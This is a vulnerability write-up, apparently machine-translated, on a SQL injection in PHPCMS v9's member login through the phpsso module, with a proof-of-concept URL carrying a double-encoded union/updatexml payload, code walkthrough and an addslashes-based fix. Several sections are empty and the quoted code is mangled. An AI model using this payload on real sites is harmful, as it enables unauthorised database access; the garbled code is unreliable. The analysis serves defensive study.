PHPCMS \phpcms\modules\member\index.php User Login SQL Injection Vulnerability analysis

Catalog

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description
2. Vulnerability Trigger Condition

0x1:poc

http//Localhost/phpcms_v9/index.php?m=member&c=index&a=loginDosubmit=1&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml (1%252cconcat (0x5e24%252C (Select%2buser ())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c (%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523//Verification code can be manually filled out, or the Code validation logic in the temporary comment out

URL encoding "&username=" is used as the value of password to overwrite the previous username value in Phpsso, followed by a two-time URL-encoded SQL statement after "&username="

3. Vulnerability Impact Range
4. Vulnerability Code Analysis

\phpsso_server\phpcms\modules\phpsso\classes\phpsso.class.php

if(Isset ($_post['Data']))         {            /*Assign the getapplist () result to $_post[' data ', after Auth_key decoding, use PARSE_STR to parse the array format code if it is not a problem before php5.3, because the default            In case Parse_str will start the GPC mechanism to escape the special character but after php5.3 the GPC mechanism is closed by default, which results in the risk of injection if the parsed content is left intact, if it has a special character such as a single quote. */parse_str (Sys_auth ($_post['Data'],'DECODE', $ This->applist[$ This->appid]['Authkey']), $ This-data); if(Empty ($ This->data) | | !is_array ($ This-data)) {Exit ('0'); }        }         Else{exit ('0'); }

Continue to follow the code for login behavior
\phpsso_server\phpcms\modules\phpsso\index.php

 Publicfunction Login () {//$this->data content is not processed directly into the database query, if we have auth_key, we can construct a malicious content to commit the SQL injection Vulnerability$ This->password = Isset ($ This->data['Password']) ? $ This->data['Password'] :"'; $ This->email = Isset ($ This->data['Email']) ? $ This->data['Email'] :"'; if($ This-email) {$userinfo= $ This->db->get_one (Array ('Email'=>$ This-email)); } Else{$userinfo= $ This->db->get_one (Array ('username'=>$ This-username)); }

To directly use the login logic for SQL injection, you need a hacker with auth_key,phpcms Auth_key leak-related knowledge, see another article

http://www.cnblogs.com/LittleHann/p/4624198.html

We continue to discuss the situation where hackers are not auth_key, we continue to analyze
\phpcms\modules\member\index.php
The login method in

//The username used by Is_username was filtered and password did not do any processing$username = Isset ($_post['username']) && Is_username ($_post['username']) ? Trim ($_post['username']): ShowMessage (L ('Username_empty'), http_referer); $password= Isset ($_post['Password']) && Trim ($_post['Password']) ? Trim ($_post['Password']): ShowMessage (L ('Password_empty'), http_referer); $cookietime= Intval ($_post['Cookietime']); $synloginstr="';//Synchronous Login JS Code                        if(Pc_base::load_config ('system','Phpsso'))             {                $ This-_init_phpsso (); //Pass the client's Ps_member_login method to the $username, $password get a piece of data$status = $ This->client->Ps_member_login ($username, $password); $memberinfo= Unserialize ($status);

Follow up on Ps_member_login
\phpcms\modules\member\classes\client.class.php

     Publicfunction Ps_member_login ($username, $password, $isemail =0)     {        if($isemail) {if(!$ This-_is_email ($username)) {                return-3; }            $return= $ This->_ps_send ('Login', Array ('Email'= $username,'Password'=$password)); } Else {            $return= $ This->_ps_send ('Login', Array ('username'= $username,'Password'=$password)); }        return$return; }    /** * Send data * @param $action operation * @param $data data*/    Privatefunction _ps_send ($action, $data =NULL)     {        //_ps_post This method to the Phpsso mechanism of the request login behavior, that is, member authentication is done through Phpsso, while the Phpsso authentication data is required Auth_key encoding         return$ This->_ps_post ($ This->ps_api_url."/index.php?m=phpsso&c=index&a=". $action,500000, $ This-Auth_data ($data)); }

Attack vectors

1 login user to submit user name and password to Menber 2 the member login then sends the HTTP packet Phpsso request login authentication via the Ps_member_login construct and encodes the user name and password using Auth_key as the post data for the HTTP packet 3  4. Throughout the certification process, password did not do any processing on the direct incoming Phpsso,phpsso did not filter the decoded data, resulting in Phpsso SQL injection problem

5. Defense Methods

The best way to add filter code for the Phpsso module is to put the escape and filtering in the previous step of the database operation, which can be extremely effective in mitigating the problems of SQL injection
\phpcms\modules\member\index.php

$username = Isset ($_post['username']) && Is_username ($_post['username']) ? Trim ($_post['username']): ShowMessage (L ('Username_empty'), http_referer);//$password = isset ($_post[' password ')) && trim ($_post[' password ')) trim ($_post[' password ']): ShowMessage (L (' Password_empty '), http_referer);/*filtering, escaping*/$password= Isset ($_post['Password']) && Trim ($_post['Password']) ? Addslashes (UrlDecode (Trim ($_post['Password'])): ShowMessage (L ('Password_empty'), http_referer);/**/

Relevant Link:

http://Www.tang3.org/blog/2015/07/21/PHPCMS User Login SQL Injection Vulnerability analysis/

6. Defensive Thinking

Copyright (c) Little5ann All rights reserved

PHPCMS \phpcms\modules\member\index.php User Login SQL Injection Vulnerability analysis